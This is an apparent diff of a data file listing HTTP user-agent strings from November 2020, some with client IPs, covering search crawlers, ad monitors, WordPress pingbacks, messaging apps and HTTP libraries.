    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.255]
    +Ad Muncher
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.173]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.168]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.226]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.82]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.65]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.215]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.235]
    +WhatsApp/2.16.95 A
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.48]
    +NetSurf/3.10 (windows)
    +WordPress/5.5.3; https://www.easyprintersupport.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605662276-0
    +WordPress/5.5.3; http://localhost/ws/wordpress
    +WhatsApp/2.2047.7 N
    +WhatsApp/2.20.207.1 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605726611-0
    +WhatsApp/2.20.207.2 A
    +Mozilla/5.0 (compatible; theoldreader.com; 5 subscribers; feed-id=5150fe4c4dce573ebb045f18)
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201112.191139
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605714554-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605736873-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605736904-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605736895-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605736938-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605663210-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605675771-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605678347-0
    +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) adbeat.com/policy Gecko/20100101 Firefox/81.0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605698565-0
    +WordPress/5.4.4; https://affiliatezaitaku.tokyo
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605728738-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605728754-0
    +WordPress/5.5.3; https://loveflora.ru
    +WordPress/5.5.3; https://kslift.ru
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201112.191139
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/190509.230546 PTST/201112.191139
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 7.0; TECNO_F3 ) U2/1.0.0 Mobile
    +okhttp/3.12.5 [ip:176.200.239.131]
    +okhttp/3.12.5 [ip:176.200.244.200]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.34]
    +okhttp/4.8.1 [ip:213.32.4.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.113]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.185]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.66.217]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.5]
    +okhttp/3.11.0 [ip:37.161.7.20]
    +okhttp/3.11.0 [ip:93.33.6.15]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.102]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.55]
    +debian APT-HTTP
    +debian APT-HTTP/1.3
    +debian APT-HTTP/1.3 (1.6.11)
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.139.21]
    +okhttp/3.11.0 [ip:95.74.57.218]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.233]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.227]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.71]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.243]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.36]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.180]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:213.32.4.224]
    +AvsDeviceSdk/1.12.1
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.171]
    +okhttp/3.12.5 [ip:5.77.75.198]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.66.215]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.191]
    +Mozilla/5.0 (Windows NT 6.1; Neustar WPM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
    +Mozilla/5.0 (Windows NT 6.1; Neustar WPM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
    +Mozilla/5.0 (Windows NT 6.1; rv:38.0; Neustar WPM) Gecko/20100101 Firefox/38.0
    +Mozilla/5.0 (Windows NT 6.1; rv:45.0; Neustar WPM) Gecko/20100101 Firefox/45.0
    +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0; Neustar WPM) Gecko/20100101 Firefox/38.0
    +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0; Neustar WPM) Gecko/20100101 Firefox/45.0
    +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0; Neustar WPM) Gecko/20100101 Firefox/31.0
    +okhttp/3.12.5 [ip:5.168.195.255]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.42]
    +NaverMailApp/2.1.23 (Android 7.0; SM-N920S)
    +NaverMailApp/2.2.2 (Android 7.0; SM-N920K)
    +NaverMailApp/2.1.23 (Android 9; SM-G950N)
    +NaverMailApp/2.1.23 (Android 9; SM-N950N)
    +NaverMailApp/2.1.14 (Android 9; SM-N976N)
    +NaverMailApp/2.1.23 (Android 9; Redmi Note 5)
    +NaverMailApp/2.2.2 (Android 8.1.0; SM-G887N)
    +NaverMailApp/2.2.2 (Android 10; LM-V500N)
    +NaverMailApp/2.2.2 (Android 9; SM-G950N)
    +NaverMailApp/2.2.2 (Android 10; SM-G977N)
    +NaverMailApp/2.1.23 (Android 10; SM-N960N)
    +NaverMailApp/2.1.23 (Android 9; SM-G977N)
    +NaverMailApp/2.1.20 (Android 9; SM-N950N)
    +NaverMailApp/2.2.2 (Android 8.1.0; SM-N960N)
    +NaverMailApp/2.1.17 (Android 9; SM-N971N)
    +NaverMailApp/2.2.0 (Android 8.0.0; SM-G930S)
    +NaverMailApp/2.1.14 (Android 10; SM-N976N)
    +NaverMailApp/2.2.2 (Android 10; SM-N960N)
    +NaverMailApp/2.2.2 (Android 9; SM-G977N)
    +NaverMailApp/2.2.2 (Android 9; SM-N935S)
    +NaverMailApp/2.2.2 (Android 9; SM-N950N)
    +NaverMailApp/2.2.2 (Android 10; SM-G986N)
    +NaverMailApp/2.2.2 (Android 10; SM-G965N)
    +NaverMailApp/2.2.2 (Android 10; SM-G960N)
    +NaverMailApp/2.2.2 (Android 8.0.0; SM-G930L)
    +NaverMailApp/2.2.2 (Android 9; SM-G887N)
    +NaverMailApp/2.2.2 (Android 10; SM-N976N)
    +NaverMailApp/2.2.2 (Android 10; SM-N971N)
    +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 [ip:5.255.253.179]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.90.93]
    +WhatsApp/2.2047.10 N
    +Python/3.6 aiohttp/3.7.3
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605823283-0
    +Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)
    +WordPress/5.5.3; https://econlib.ru
    +WordPress/4.9.7; https://www.bengalkart.com
    +Python/3.7 aiohttp/3.7.2
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 OPR/71.0.3770.198
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605817209-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605746000-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605750796-0
    +WhatsApp/2.20.207.3 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605792001-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36 Edg/86.0.622.43
    +WhatsApp/2.20.206.15 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605817197-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605817198-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1605805824-60
    +SiteSucker/2.3.4
    +WordPress/4.9.16; http://www.bqblhe.co
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.118]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.56]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.95]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.67]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.25]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.107]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.183]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.12]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.117]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.5]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.58]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.90]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.126]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.139.27]
    +okhttp/3.11.0 [ip:5.90.200.135]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.181]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.140]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.61]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.78]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.136]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.152]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.64]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.220]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.178]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.139.63]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.35]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.18]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.140]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.106]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1
    +Mozilla/5.0 (X11; Linux x86_64; rv:82.0) adbeat.com/policy Gecko/20100101 Firefox/82.0
    +WordPress.com; http://innovagility.com
    +MaxPointCrawler/Nutch-1.17 (valassis.crawler at valassis dot com)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605906670-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605906684-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605849733-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1605835655-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605848920-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605848947-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605849721-0
    +okhttp/3.14.4
    +PycURL/7.43.0.6 libcurl/7.68.0 OpenSSL/1.1.1f zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
    +WhatsApp/2.20.207.4 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605889235-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605901666-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605904374-0
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edg/86.0.622.51
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605907964-0
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201119.201155
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605883084-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605883088-0
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1605865098-60
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:173.252.127.15]
    +WordPress/5.5.3; https://practicalprogramming.fr
    +WordPress/5.5.3; http://repository.zeile1.local
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:157.55.39.176]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.188.109]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.63]
    +okhttp/3.12.5 [ip:37.161.136.255]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.213]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.141]
    +okhttp/3.11.0 [ip:37.163.177.52]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.33]
    +okhttp/3.10.0 [ip:213.32.4.102]
    +okhttp/3.10.0 [ip:213.32.4.95]
    +okhttp/3.10.0 [ip:213.32.4.245]
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.76.18]
    +okhttp/3.12.5 [ip:37.160.4.112]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/85.0.4183.140 Mobile Safari/537.36 [ip:66.249.91.56]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.191.131]
    +Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) [ip:74.125.216.44]
    +okhttp/3.12.5 [ip:5.11.101.224]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.125]
    +okhttp/3.12.5 [ip:176.32.20.20]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.56]
    +okhttp/4.8.1 [ip:213.32.4.115]
    +Python/3.8 aiohttp/3.7.3
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605983573-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605938511-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605938461-0
    +WhatsApp/2.2047.11 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1605963536-0
    +WordPress/5.2.9; https://esperanto.berlin/de
    +WhatsApp/2.20.207.5 A
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1605990649-60
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.190.18]
    +libwww-perl/5.820 [ip:213.32.4.95]
    +CCBot/2.0 (https://commoncrawl.org/faq/) [ip:213.32.4.115]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.202.89]
    +CCBot/2.0 (https://commoncrawl.org/faq/) [ip:213.32.4.211]
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/86.0.4240.96 Mobile Safari/537.36 [ip:72.14.199.216]
    +okhttp/4.7.2 [ip:213.32.4.115]
    +Go-http-client/1.1 [ip:213.32.4.95]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.20]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.8]
    +okhttp/3.11.0 [ip:37.161.153.129]
    +okhttp/3.12.5 [ip:5.77.75.231]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:13.66.139.34]
    +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b [ip:40.77.189.175]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.145]
    +okhttp/3.11.0 [ip:37.161.168.169]
    +okhttp/3.12.5 [ip:2.226.135.180]
    +okhttp/4.7.2 [ip:213.32.4.95]
    +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2 [ip:213.32.4.224]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.2]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.92]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.90]
    +Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) [ip:66.249.73.88]
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36 [ip:66.249.76.76]
    +Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/) [ip:213.32.4.224]
    +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) [ip:207.46.13.11]
    +WordPress/4.9.16; https://dlandroid24.com; verifying pingback from 107.175.2.108
    +WordPress/5.5.3; https://longsword.ru
    +WhatsApp/2.20.205.17 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606066418-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606064500-10
